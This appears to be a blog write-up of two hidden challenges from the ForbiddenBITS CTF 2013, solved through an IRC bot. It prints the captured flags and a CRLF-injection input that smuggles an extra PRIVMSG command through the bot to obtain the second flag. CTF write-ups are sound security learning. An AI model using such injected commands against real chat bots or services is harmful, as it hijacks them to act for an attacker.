IT Security Enthusiast

[ForbiddenBITS CTF 2013] [Writeup] [Hidden1 & Hidden2]

No comments
In the CTF IRC Channel (irc://freenode.net/forbiddenbits) we see
in description:
//try to have fun with our bot :D

So we tried to execute some commands, and we got some of them "!", "!help" , "!flag", "!hidden", ...

[16:26] <AchN30_> !help
[16:26] <[FB]BOTx> 8,1 ima stupid bot :

Hidden Challenge 01:

[16:50] <AchN30_> !flag
[16:50] <[FB]BOTx> Here's Your Bloody Flag {bcba84b2e0774f4d30d630d7bce8afa1}

Flag: bcba84b2e0774f4d30d630d7bce8afa1

Hidden Challenge 02:

[16:28] <AchN30_> !hidden
[16:28] <[FB]BOTx> Make me say "CAN I HAZ FLAG" to Stephnix, dont forget to mention your nickname

Hmmms Let's try CrLf Injection..

[16:43] <AchN30_> test\n PRIVMSG AchN30_ :HEllO WORLD!
[16:43] <[FB]BOTx> test
[16:43] <[FB]BOTx> HEllO WORLD!
now we can query Stephnix to get the flag

Cool, now let's get the flag :)

[16:47] <AchN30_> \n PRIVMSG Stephnix :AchN30_: CAN I HAZ FLAG
after couple of minutes Stephnix query AchN30_ the flag

Flag: c272047fb6327750109b0f9b95d2e6f4

No comments :

Post a Comment